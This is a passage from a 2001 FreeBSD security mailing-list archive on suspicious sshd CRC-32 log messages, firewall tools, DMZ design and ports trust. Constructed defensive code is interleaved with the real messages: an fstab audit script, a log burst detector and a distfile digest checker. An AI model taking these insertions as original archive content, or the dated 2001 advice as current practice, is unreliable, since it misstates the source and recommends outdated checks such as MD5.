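# has_option OPTIONS OPTION: succeeds if OPTION appears in the comma list
has_option() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# audit_fstab FILE: prints "<mountpoint> missing <option>" for each missing
# flag and "<mountpoint> not in fstab" for a policy entry with no matching
# line. Exit status 0 when the whole policy is satisfied, 1 otherwise.
audit_fstab() {
    fstab=$1
    missing=0
    while read -r mnt required; do
        [ -n "$mnt" ] || continue
        # options field (4th column) of the non-comment line mounted on $mnt
        opts=$(awk -v m="$mnt" '$1 !~ /^#/ && $2 == m { print $4; exit }' "$fstab")
        if [ -z "$opts" ]; then
            printf '%s not in fstab\n' "$mnt"
            missing=$((missing + 1))
            continue
        fi
        # split the required list on commas into the positional parameters
        saved_ifs=$IFS
        IFS=,
        set -- $required
        IFS=$saved_ifs
        for opt in "$@"; do
            if ! has_option "$opts" "$opt"; then
                printf '%s missing %s\n' "$mnt" "$opt"
                missing=$((missing + 1))
            fi
        done
    done <<EOF
$FSTAB_POLICY
EOF
    [ "$missing" -eq 0 ]
}

# write_sample_fstab FILE: constructed fstab in which /tmp lacks nodev
write_sample_fstab() {
    cat > "$1" <<'EOF'
# Device      Mountpoint   FStype  Options              Dump  Pass#
/dev/ad0s1a   /            ufs     rw                   1     1
/dev/ad0s1f   /tmp         ufs     rw,nosuid            2     2
/dev/ad0s1d   /usr         ufs     rw                   2     2
/dev/ad0s1h   /usr/people  ufs     rw,nosuid,userquota  2     2
/dev/ad0s1g   /var         ufs     rw                   2     2
EOF
}

# Stand-alone run: reports "/tmp missing nodev" and a non-zero status.
sample=$(mktemp)
write_sample_fstab "$sample"
audit_fstab "$sample" || echo "fstab does not satisfy the policy (status $?)"
rm -f "$sample"
```

Run it against a real /etc/fstab with `audit_fstab /etc/fstab`; the symlinks for /usr/tmp and /var/tmp that the guide also asks for are not covered by this check.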
From owner-freebsd-security Thu Nov 22 05:02:19 2001
Date: Thu, 22 Nov 2001 08:01:50 -0500 (EST)
From: "Michael Richards"
To: freebsd-security@FreeBSD.ORG
Subject: Odd sshd messages
Message-Id: <3BFCF73E.000001.96546@frodo.searchcanada.ca>

I've been getting a number of odd sshd messages. I do not believe my sshd is vulnerable to any exploits. Here is what I see:

    Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes on input.
    Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes on input.
    Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes on input.
    Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes on input.
    Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes on input.

May just be a bogus client, but it may also be someone hammering at the back door.
I'm running:
sshd version OpenSSH_2.3.0

-Michael
_________________________________________________________________
http://fastmail.ca/ - Fast Free Web Email for Canadians

From owner-freebsd-security Thu Nov 22 05:48:12 2001
Date: Thu, 22 Nov 2001 14:47:48 +0100
From: Clemens Hermann
To: FreeBSD security ML
Subject: Juniper firewall
Message-ID: <20011122144748.A241@homer.local>
X-Mailer: Mutt 1.2.5i (FreeBSD 4.4-RELEASE i386)

Hi

On my search for a toolkit to build a proxy firewall I found the Juniper firewall. This one sounds interesting but seems to be dead. Majordomo does not respond and I couldn't find anything in the ports.
Might anyone give a comment on Juniper if it can be used on a recent FreeBSD?

tia

/ch

-- 
How many Microsoft employees does it take to change a broken light bulb? None, Microsoft declares darkness the market standard.

From owner-freebsd-security Thu Nov 22 06:09:55 2001
Date: Thu, 22 Nov 2001 06:09:44 -0800
From: Gabriel Rocha
To: security@freebsd.org
Subject: Re: Unknown transient service 1528/tcp
Message-ID: <20011122060944.D8188@neutraldomain.org>
In-Reply-To: <020801c1730b$8cd21fe0$41414fcb@lawn>; from lawngf@ihug.co.nz on Thu, Nov 22, 2001 at 05:08:34PM +1300
X-ideology: "VIVERE LIBERE AUT MORI"

On Thu, Nov 22, at 05:08PM, Geoff Lawn wrote:
| Recently I noticed the following service appear...
| 1528/tcp open mciautoreg

Compile yourself a copy of lsof then run, as root, "lsof -iTCP:25" and enjoy. Good luck.
--Gabe

-- 
Churchill, Winston Leonard Spencer -- On the eve of Britain's entry into World War II:
"If you will not fight for right when you can easily win without bloodshed; if you will not fight when your victory will be sure and not too costly; you may come to the moment when you will have to fight with all odds against you and only a precarious chance of survival. There may be even a worse fate. You may have to fight when there is no hope of victory, because it is better to perish than to live as slaves.

From owner-freebsd-security Thu Nov 22 07:44:30 2001
Date: Thu, 22 Nov 2001 10:43:56 -0500 (EST)
From: "Michael Richards"
To: fernan@iib.unsam.edu.ar
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Odd sshd messages
Message-Id: <3BFD1D3C.000003.54439@frodo.searchcanada.ca>
If this is the case and I'm running a non-vulnerable 2.3.0 version then why do I get these messages?

-Michael

> This is documented at
> http://www.cert.org/incident_notes/IN-2001-12.html
>
> Quoting it:
>
> Exploitation of vulnerability in SSH1 CRC-32 compensation attack
> detector Original release Date: November 5, 2001
> Last revised: November 7, 2001

_________________________________________________________________
http://fastmail.ca/ - Fast Free Web Email for Canadians

From owner-freebsd-security Thu Nov 22 07:57:56 2001
Date: Thu, 22 Nov 2001 17:08:16 +0100
From: Enrico Giakas
To: Clemens Hermann, FreeBSD security ML
Subject: Re: Juniper firewall
Message-ID: <598111959.1006448896@[192.168.102.87]>
In-Reply-To: <20011122144748.A241@homer.local>
X-Mailer: Mulberry/2.1.0 (Win32)

Hi

Try the NEC SOCKS5-Proxy Firewall (it is free) from
the site: http://www.socks.nec.com/cgi-bin/download.pl

bye

> Hi
>
> On my search for a toolkit to build a proxy firewall I found the Juniper
> firewall. This one sounds interesting but seems to be dead. Majordomo
> does not respond and I couldn't find anything in the ports.
> Might anyone give a comment on Juniper if it can be used on a recent
> FreeBSD?
>
> tia
>
> /ch
>
> --
> How many Microsoft employees does it take to change a broken light bulb?
> None, Microsoft declares darkness the market standard.

_____________________________________________________
Enrico Giakas
Network Laboratories Heidelberg
NEC Europe Ltd.
Adenauerplatz 6
D-69115 Heidelberg, Germany
Tel.:+49/(0) 62 21/905 11- 12
Fax :+49/(0) 62 21/905 11- 55
email: Enrico.Giakas@ccrle.nec.de
_____________________________________________________

From owner-freebsd-security Thu Nov 22 08:26:17 2001
Date: Thu, 22 Nov 2001 17:25:55 +0100
From: Clemens Hermann
To: Enrico Giakas
Cc:
FreeBSD security ML
Subject: Re: Juniper firewall
Message-ID: <20011122172555.A241@homer.local>
In-Reply-To: <598111959.1006448896@[192.168.102.87]>; from Enrico Giakas on 22.Nov.2001 at 17:08:16 (+0100)
X-Mailer: Mutt 1.2.5i (FreeBSD 4.4-RELEASE i386)

On 22.11.2001 at 17:08:16 Enrico Giakas wrote:

Hi Enrico,

> Try the NEC SOCKS5-Proxy Firewall (it is free) from the site:
> http://www.socks.nec.com/cgi-bin/download.pl

thanks for the hint. Isn't Socks like NAT with authentication (in the result)? Does Socks offer any kind of filtering on the application-layer? Am I wrong in my assumption that a "real" application proxy can offer more security e.g. by not allowing to misuse open ports for any app on non-standard ports?

/ch

-- 
How many Microsoft employees does it take to change a broken light bulb? None, Microsoft declares darkness the market standard.
From owner-freebsd-security Thu Nov 22 08:30:58 2001
Date: Thu, 22 Nov 2001 11:41:25 -0500 (COT)
From: Juan Mauricio Camayo
To: freebsd-security@FreeBSD.ORG
Subject: Help on directories

Hello.

If someone knows about a program that prevents users from going back from their own directory, but allows them to "see" their directories in it, just like the lids on Unix or Linux, but not as restrictive as bash -r. English is not my native language, so I'm sorry if I made mistakes.
From owner-freebsd-security Thu Nov 22 08:41:31 2001
Date: Thu, 22 Nov 2001 17:51:52 +0100
From: Enrico Giakas
To: Clemens Hermann
Cc: FreeBSD security ML
Subject: Re: Juniper firewall
Message-ID: <600728021.1006451512@[192.168.102.87]>
In-Reply-To: <20011122172555.A241@homer.local>
X-Mailer: Mulberry/2.1.0 (Win32)

Hi

Please look to http://www.socks.nec.com/guidelines.html for further details

Bye

--On Thursday, 22 November 2001 17:25 +0100 Clemens Hermann wrote:

> On 22.11.2001 at 17:08:16 Enrico Giakas wrote:
>
> Hi Enrico,
>
>> Try the NEC SOCKS5-Proxy Firewall (it is free) from the site:
>> http://www.socks.nec.com/cgi-bin/download.pl
>
> thanks for the hint. Isn't Socks like NAT with authentication (in the
> result)? Does Socks offer any kind of filtering on the application-layer?
> Am I wrong in my assumption that a "real" application proxy can offer more
> security e.g. by not allowing to misuse open ports for any app on
> non-standard ports?
>
> /ch
>
> --
> How many Microsoft employees does it take to change a broken light bulb?
> None, Microsoft declares darkness the market standard.
>

_____________________________________________________
Enrico Giakas
Network Laboratories Heidelberg
NEC Europe Ltd.
Adenauerplatz 6
D-69115 Heidelberg, Germany
Tel.:+49/(0) 62 21/905 11- 12
Fax :+49/(0) 62 21/905 11- 55
email: Enrico.Giakas@ccrle.nec.de
_____________________________________________________

From owner-freebsd-security Thu Nov 22 09:02:11 2001
Date: Thu, 22 Nov 2001 18:02:03 +0100
From: Axel Scheepers
To: Juan Mauricio Camayo
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Help on directories
Message-ID: <20011122180203.C61433@mars.thuis>
Reply-To: Axel Scheepers
In-Reply-To: ; from jmcamayo@libertad.univalle.edu.co on Thu, Nov 22, 2001 at 11:41:25AM -0500
User-Agent: Mutt/1.2.5i

On Thu, Nov 22, 2001 at 11:41:25AM
-0500, Juan Mauricio Camayo wrote:
> If someone knows about a program that prevents users from going back from their
> own directory, but allows them to "see" their directories in it, just like the
> lids on Unix or Linux, but not as restrictive as bash -r.

I'm not quite sure what you mean, but you could try to chmod g-x for the dir, that way it is still visible but only the owner can cd into it.

Hope this helps,
-- 
Axel Scheepers
UNIX System Administrator

email: axel@axel.truedestiny.net
       ascheepers@vianetworks.nl
http://axel.truedestiny.net/~axel
------------------------------------------
"You can't survive by sucking the juice from a wet mitten."
-- Charles Schulz, "Things I've Had to Learn Over and Over and Over"
------------------------------------------

From owner-freebsd-security Thu Nov 22 09:04:46 2001
Date: Thu, 22 Nov 2001 12:21:47 -0300
From: Fernan Aguero
To: Michael Richards
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Odd sshd messages
Message-ID: <20011122122147.A11367@iib005.iib.unsam.edu.ar>
References: <3BFCF73E.000001.96546@frodo.searchcanada.ca>
User-Agent: Mutt/1.2.5i
In-Reply-To: <3BFCF73E.000001.96546@frodo.searchcanada.ca>; from michael@fastmail.ca on Thu, Nov 22, 2001 at 08:01:50AM -0500
X-PGP-Key: http://genoma.unsam.edu.ar/~fernan/pubkey.asc

This is documented at
http://www.cert.org/incident_notes/IN-2001-12.html

Quoting it:

  Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector

  Original release Date: November 5, 2001
  Last revised: November 7, 2001

  I. Overview

  The CERT/CC has received multiple reports of systems being compromised via the CRC-32 compensation attack detector vulnerability described in VU#945216. We are also receiving reports of increased scanning activity for the SSH service (22/tcp).

  II. Description

  In reports received by the CERT/CC, systems compromised via this vulnerability have exhibited the following pattern in system log messages:

      hostname sshd[xxx]: Disconnecting: Corrupted check bytes on input.
      hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected
      hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected
      ...

  The exploit for this vulnerability appears to use a brute force method, so many messages of this type may be logged before a system is successfully compromised.

... and goes on. Read the document for suggested solutions, basically
- apply a patch
- disable SSHv1 fallback support
- restrict use of SSH service (until a patch can be applied)

Fernan

+----[ Michael Richards (michael@fastmail.ca) said about "Odd sshd messages":
|
| I've been getting a number of odd sshd messages. I do not believe my
| sshd is vulnerable to any exploits. Here is what I see:
|
| Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes
| on input.
| Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes
| on input.
| Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes
| on input.
| Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes
| on input.
| Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes
| on input.
|
| May just be a bogus client, but it may also be someone hammering at
| the back door.
|
| I'm running:
| sshd version OpenSSH_2.3.0
|
| -Michael
| _________________________________________________________________
| http://fastmail.ca/ - Fast Free Web Email for Canadians
|
+----]

--
| F e r n a n   A g u e r o   | B i o i n f o r m a t i c s |
| fernan@iib.unsam.edu.ar     | genoma.unsam.edu.ar         |

From owner-freebsd-security Thu Nov 22 9:28: 5 2001
Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id D280437B405 for ; Thu, 22 Nov 2001 09:27:58 -0800 (PST)
Received: from DAVE ([192.168.0.54]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id fAMHRm602184 for ; Thu, 22 Nov 2001 19:27:53 +0200 (SAST) (envelope-from dave@raven.za.net)
Message-ID: <001b01c1737a$9f1a7480$3600a8c0@DAVE>
From: "Dave Raven"
References: <20011122180203.C61433@mars.thuis>
Subject: Re: Help on directories
Date: Thu, 22 Nov 2001 19:24:57 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

As to whether or not this was the original question I am unsure, but on the
subject I was wondering how you achieve the same effect as adding a user to
/etc/ftpchroot
with a telnet / sshd shell. This would be so the user can access his
directory etc (/home/bob) but not cd below it. Many shell servers etc use it.

At least, I think that was the question.

--Dave
Optec Sec.

----- Original Message -----
From: "Axel Scheepers"
To: "Juan Mauricio Camayo"
Sent: Thursday, November 22, 2001 7:02 PM
Subject: Re: Help on directories

> On Thu, Nov 22, 2001 at 11:41:25AM -0500, Juan Mauricio Camayo wrote:
> > If someone knows about a program that prevents the users from going back of their
> > own directory, but allows them to "see" their directories on it, just like the
> > lids on Unix or linux, but not as restrictive as bash -r.
>
> I'm not quite sure what you mean, but you could try to chmod g-x for the dir;
> that way it is still visible but only the owner can cd into it.
> Hope this helps,
> --
> Axel Scheepers
> UNIX System Administrator
>
> email: axel@axel.truedestiny.net
>        ascheepers@vianetworks.nl
> http://axel.truedestiny.net/~axel
> ------------------------------------------
> "You can't survive by sucking the juice from a wet mitten."
> -- Charles Schulz, "Things I've Had to Learn Over and
> Over and Over"
> ------------------------------------------

From owner-freebsd-security Thu Nov 22 9:54: 7 2001
Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 974F037B405 for ; Thu, 22 Nov 2001 09:54:04 -0800 (PST)
Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1) id 166y3f-000Bto-00; Thu, 22 Nov 2001 19:54:43 +0200
From: Sheldon Hearn
To: Fernan Aguero
Cc: Michael Richards, freebsd-security@FreeBSD.ORG
Subject: Re: Odd sshd messages
In-reply-to: Your message of "Thu, 22 Nov 2001 12:21:47 -0300." <20011122122147.A11367@iib005.iib.unsam.edu.ar>
Date: Thu, 22 Nov 2001 19:54:43 +0200
Message-ID: <45743.1006451683@axl.seasidesoftware.co.za>

On Thu, 22 Nov 2001 12:21:47 -0300, Fernan Aguero wrote:

> This is documented at
> http://www.cert.org/incident_notes/IN-2001-12.html

Oddly enough, the source you quote says that this was addressed in
OpenSSH-2.3.0, which is the version the original poster claimed to be using.

Ciao,
Sheldon.
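The CERT note Fernan quotes and Michael's own excerpt describe the same signal: the detector messages arrive in a burst, many per minute, because the exploit brute-forces. The following is an added example, written for this archive and not taken from any poster or from CERT, that scans BSD-syslog lines for the two sshd messages the note names and reports, per host, how many were logged and whether a burst (three or more inside one minute) ever occurred. The sample log is constructed: Michael's five lines unwrapped, one ordinary login, and one lone event on a hypothetical host "bilbo"; the year, the window and the threshold are assumptions.

```python
import re
from collections import deque
from datetime import datetime

# The two sshd messages named in CERT IN-2001-12 (Michael's log shows the
# first of them in its "fatal: Local:" form).
CRC32_PATTERNS = (
    re.compile(r"Corrupted check bytes on input"),
    re.compile(r"crc32 compensation attack: network attack detected"),
)

# BSD syslog line: "Nov 21 16:50:16 frodo sshd[2950]: fatal: ..."
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)

# Constructed sample: Michael's lines unwrapped, plus one ordinary login and
# a single detector message on a hypothetical second host.
SAMPLE_LOG = """\
Nov 21 16:49:02 frodo sshd[2901]: Accepted publickey for bob from 10.0.0.5 port 4444 ssh2
Nov 21 16:50:16 frodo sshd[2950]: fatal: Local: Corrupted check bytes on input.
Nov 21 16:50:40 frodo sshd[2962]: fatal: Local: Corrupted check bytes on input.
Nov 21 16:50:44 frodo sshd[2967]: fatal: Local: Corrupted check bytes on input.
Nov 21 16:51:02 frodo sshd[2992]: fatal: Local: Corrupted check bytes on input.
Nov 21 16:51:06 frodo sshd[3001]: fatal: Local: Corrupted check bytes on input.
Nov 21 17:30:00 bilbo sshd[410]: Disconnecting: crc32 compensation attack: network attack detected
this line is not syslog at all
"""


def parse_line(line, year=2001):
    """Parse one syslog line; BSD syslog omits the year, so it is supplied."""
    m = SYSLOG_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                           "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "pid": int(m["pid"]), "msg": m["msg"]}


def is_crc32_event(msg):
    """True when the message is one of the two detector messages."""
    return any(p.search(msg) for p in CRC32_PATTERNS)


def find_bursts(lines, window_seconds=60, threshold=3):
    """Per host: count of detector messages, first/last timestamp, and whether
    `threshold` or more ever fell inside one `window_seconds` window.
    One message can be a broken client; a burst is the brute-force pattern."""
    recent = {}   # host -> deque of timestamps inside the current window
    report = {}   # host -> summary dict
    for line in lines:
        ev = parse_line(line)
        if ev is None or not is_crc32_event(ev["msg"]):
            continue
        host, ts = ev["host"], ev["ts"]
        q = recent.setdefault(host, deque())
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        s = report.setdefault(host, {"count": 0, "first": ts, "last": ts, "burst": False})
        s["count"] += 1
        s["last"] = ts
        if len(q) >= threshold:
            s["burst"] = True
    return report


if __name__ == "__main__":
    for host, s in find_bursts(SAMPLE_LOG.splitlines()).items():
        flag = "BURST" if s["burst"] else "single"
        print(f"{host}: {s['count']} detector messages "
              f"{s['first']:%H:%M:%S}-{s['last']:%H:%M:%S} [{flag}]")
```

The burst flag is what separates Michael's case (five messages in fifty seconds) from an occasional mismatched client; the messages themselves say nothing about whether the daemon that logged them is patched, which is the question Sheldon's reply raises and which Michael later answers by finding an old SSH 1.x daemon still started at boot.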
From owner-freebsd-security Thu Nov 22 10:21:48 2001
Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 0BD9237B405 for ; Thu, 22 Nov 2001 10:21:42 -0800 (PST)
Received: from user-33qtm2c.dialup.mindspring.com ([199.174.216.76] helo=gohan.cjclark.org) by pintail.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 166yTk-0000N2-00; Thu, 22 Nov 2001 10:21:41 -0800
Received: (from cjc@localhost) by gohan.cjclark.org (8.11.6/8.11.1) id fAMBHdQ00890; Thu, 22 Nov 2001 03:17:39 -0800 (PST) (envelope-from cjc)
Date: Thu, 22 Nov 2001 03:17:39 -0800
From: "Crist J. Clark"
To: Fernando Germano
Cc: security@FreeBSD.ORG
Subject: Re: Best security topology for FreeBSD
Message-ID: <20011122031739.A226@gohan.cjclark.org>
Reply-To: cjclark@alum.mit.edu
References: <00ca01c172aa$814c90d0$ed64a8c0@audi2k>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00ca01c172aa$814c90d0$ed64a8c0@audi2k>; from fgermano@audiotel.com.ar on Wed, Nov 21, 2001 at 01:35:18PM -0300
X-URL: http://people.freebsd.org/~cjc/

On Wed, Nov 21, 2001 at 01:35:18PM -0300, Fernando Germano wrote:
>
> Could you please help me?
>
> I'm about to install a FreeBSD 4.4 box with some firewall and I need to know
> which one of the freeware firewall products is the best (IPFW, IPFilter,
> etc), or maybe if you could recommend me a good solution for this situation:
>
> FreeBSD box = firewall with 10 NICs
>
> NIC 1 -> DMZ
> NIC 2 -> Internet
> NIC 3 -> Partner network
> .
> .
> NIC 8 -> Partner network
> NIC 9 -> Internal network
> NIC 10 -> Internal network

It is sad to see this poor design,

  Internet
     |
     |
  Firewall--"DMZ"
     |
     |
  Internal

used so very, very much these days (I think thanks to several firewall
vendors pushing this as a standard design).

A much better design is

  Internet
     |
     |
  Firewall1
     |
     |
    DMZ
     |
     |
  Firewall2
     |
     |
  Internal

(This design is actually where the term "DMZ" comes from, since it
actually looks like one here.)

And in your case... that many NICs in one machine... I hope you have a
dedicated stand-by. It's screaming "single point of failure." I would
really consider NOT using one machine for all of this.
--
Crist J. Clark                     cjclark@alum.mit.edu

From owner-freebsd-security Thu Nov 22 11:56: 6 2001
Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 4CE9037B419 for ; Thu, 22 Nov 2001 11:55:52 -0800 (PST)
Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id D6B581DA7; Thu, 22 Nov 2001 20:55:31 +0100 (CET)
Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 6369755A2; Thu, 22 Nov 2001 20:55:31 +0100 (CET)
Date: Thu, 22 Nov 2001 20:55:30 +0100 (CET)
From: Krzysztof Zaraska
X-Sender: kzaraska@lhotse.zaraska.dhs.org
To: cjclark@alum.mit.edu
Cc: security@FreeBSD.ORG
Subject: Firewall design [was: Re: Best security topology for FreeBSD]
In-Reply-To: <20011122031739.A226@gohan.cjclark.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 22 Nov 2001, Crist J.
Clark wrote:
> It is sad to see this poor design,
>
>   Internet
>      |
>      |
>   Firewall--"DMZ"
>      |
>      |
>   Internal
>
> used so very, very much these days (I think thanks to several firewall
> vendors pushing this as a standard design).
>
> A much better design is
>
>   Internet
>      |
>      |
>   Firewall1
>      |
>      |
>     DMZ
>      |
>      |
>   Firewall2
>      |
>      |
>   Internal
>
> (This design is actually where the term "DMZ" comes from, since it
> actually looks like one here.)

Could you please explain why the second design is better? I know it's
harder to properly construct the correct ruleset for the first topology,
but what are the other problems?

Thanks in advance,

Krzysztof

From owner-freebsd-security Thu Nov 22 12:29:23 2001
Received: from csmail.commserv.ucsb.edu (cspdc.commserv.ucsb.edu [128.111.251.12]) by hub.freebsd.org (Postfix) with ESMTP id EFE4A37B417 for ; Thu, 22 Nov 2001 12:29:18 -0800 (PST)
Received: from expertcity.com ([65.5.152.239]) by csmail.commserv.ucsb.edu (Netscape Messaging Server 3.62) with ESMTP id 419; Thu, 22 Nov 2001 12:29:16 -0800
Message-ID: <3BFD5FDE.171EA3A@expertcity.com>
Date: Thu, 22 Nov 2001 12:28:14 -0800
From: Steve Francis
X-Mailer: Mozilla 4.76 [en] (WinNT; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: cjclark@alum.mit.edu
Cc: Fernando Germano, security@FreeBSD.ORG
Subject: Re: Best security topology for FreeBSD
References: <00ca01c172aa$814c90d0$ed64a8c0@audi2k> <20011122031739.A226@gohan.cjclark.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

"Crist J.
Clark" wrote:
> A much better design is
>
>   Internet
>      |
>      |
>   Firewall1
>      |
>      |
>     DMZ
>      |
>      |
>   Firewall2
>      |
>      |
>   Internal
>
> (This design is actually where the term "DMZ" comes from, since it
> actually looks like one here.)
>
> And in your case... that many NICs in one machine... I hope you have a
> dedicated stand-by. It's screaming "single point of failure." I would
> really consider NOT using one machine for all of this.

Of course, your design has even more single points of failure....

From owner-freebsd-security Thu Nov 22 13: 2:24 2001
Received: from lists.blarg.net (lists.blarg.net [206.124.128.17]) by hub.freebsd.org (Postfix) with ESMTP id A319137B405; Thu, 22 Nov 2001 13:02:19 -0800 (PST)
Received: from thig.blarg.net (thig.blarg.net [206.124.128.18]) by lists.blarg.net (Postfix) with ESMTP id 4039EBD3D; Thu, 22 Nov 2001 13:02:19 -0800 (PST)
Received: from localhost.localdomain ([206.124.139.115]) by thig.blarg.net (8.9.3/8.9.3) with ESMTP id NAA20472; Thu, 22 Nov 2001 13:02:18 -0800
Received: (from jojo@localhost) by localhost.localdomain (8.11.6/8.11.3) id fAML0D475603; Thu, 22 Nov 2001 13:00:13 -0800 (PST) (envelope-from swear@blarg.net)
To: "Anthony Atkielski"
Cc: "FreeBSD Questions"
Subject: Re: setuid on nethack?
References: <014201c17336$40653f90$0a00000a@atkielski.com> <20011122112415.B855@straylight.oblivion.bg> <016001c17338$37d65240$0a00000a@atkielski.com> <20011122114813.C855@straylight.oblivion.bg> <016601c1733d$7a516b00$0a00000a@atkielski.com>
From: swear@blarg.net (Gary W.
Swearingen)
Date: 22 Nov 2001 13:00:12 -0800
In-Reply-To: <016601c1733d$7a516b00$0a00000a@atkielski.com>
Lines: 28
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.1 (Cuyahoga Valley)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

"Anthony Atkielski" writes:

> When I add ports and stuff to my system, sometimes they are picked up from some
> bizarre FTP sites, and in cases where the executables do not have to be trusted,
> some guidelines on how better to secure them would be welcome. I know that
> often they are being rebuilt from source before installation, but it isn't
> really practical to read through the source for every port just to look for
> suspicious code.

I've also worried about this sort of thing since learning the ports
system last winter. There's a lot of downloading and running of scripts
as root going on and it's scary, especially after you've spent many days
trying to improve your security. A few more observations on the subject:

The main defense seems to be the fear of being tracked down by hackers
more skillful than most crackers, aided by the use of MD5 to verify that
you're installing the same thing that someone else has already installed
and found (with meager testing, sadly, but necessarily) to work OK.

I've read of little vandalware on FreeBSD (or Linux). The risk seems
acceptable for most people, at least those who do backups. There also
might not be any less risky practical alternatives for many.

If one learns the details of the ports system, one can do all or most of
the ports stuff as a regular user, downloading, building, and installing
to non-standard, non-root-protected directories. Someone posted some
clues about this on -questions (or -stable?) within the last couple of
weeks, but I can't find my copy of it.
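Gary's "use of MD5 to verify that you're installing the same thing that someone else has already installed" is the ports tree's distinfo check. The following is an added example, written for this archive and not code from any poster or from the ports system itself, of what that check does: it parses distinfo-style lines ("MD5 (file) = hex", later also "SHA256 (file) = hex" and "SIZE (file) = n"), compares them against the bytes that were actually downloaded, and reports the case where only MD5 vouches for the file, since MD5 is no longer collision resistant. The distfile name "nethack-3.3.1.tgz" and its three-byte contents are constructed; the digests are the standard test-vector values for that input.

```python
import hashlib
import re

# One distinfo line: "<ALGO> (<distfile>) = <value>"; SIZE carries a byte count.
DISTINFO_RE = re.compile(r"^(?P<algo>[A-Z0-9]+) \((?P<file>[^)]+)\) = (?P<value>\S+)$")

# Constructed sample: a hypothetical distfile whose contents are b"abc".
DISTFILE = "nethack-3.3.1.tgz"
GOOD_DATA = b"abc"
DISTINFO = """\
MD5 (nethack-3.3.1.tgz) = 900150983cd24fb0d6963f7d28e17f72
SHA256 (nethack-3.3.1.tgz) = ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
SIZE (nethack-3.3.1.tgz) = 3
"""
# The 2001-era form: MD5 is the only digest recorded.
DISTINFO_MD5_ONLY = "MD5 (nethack-3.3.1.tgz) = 900150983cd24fb0d6963f7d28e17f72\n"


def parse_distinfo(text):
    """Return {distfile: {ALGO: value}} for every well-formed line."""
    entries = {}
    for raw in text.splitlines():
        m = DISTINFO_RE.match(raw.strip())
        if m is None:
            continue  # blank line, comment, or garbage: ignore
        entries.setdefault(m["file"], {})[m["algo"]] = m["value"]
    return entries


def verify_distfile(distinfo_text, filename, data):
    """Check downloaded bytes `data` against the distinfo entry for `filename`.

    Returns ok (every recorded check matched), checked/failed (algorithm
    names), weak (ok, but nothing stronger than MD5 and SIZE vouched for
    the file) and a short reason string when not ok."""
    expected = parse_distinfo(distinfo_text).get(filename)
    if expected is None:
        return {"ok": False, "checked": [], "failed": [], "weak": False,
                "reason": "no distinfo entry"}
    checked, failed = [], []
    for algo, want in expected.items():
        if algo == "SIZE":
            got = str(len(data))
        elif algo.lower() in hashlib.algorithms_available:
            got = hashlib.new(algo.lower(), data).hexdigest()
        else:
            continue  # algorithm we cannot compute: neither pass nor fail
        (checked if got == want else failed).append(algo)
    ok = bool(checked) and not failed
    weak = ok and all(a in ("MD5", "SIZE") for a in checked)
    reason = "" if ok else ("digest mismatch" if failed else "nothing verifiable")
    return {"ok": ok, "checked": sorted(checked), "failed": sorted(failed),
            "weak": weak, "reason": reason}


if __name__ == "__main__":
    print("intact :", verify_distfile(DISTINFO, DISTFILE, GOOD_DATA))
    print("altered:", verify_distfile(DISTINFO, DISTFILE, b"abd"))
    print("md5only:", verify_distfile(DISTINFO_MD5_ONLY, DISTFILE, GOOD_DATA))
```

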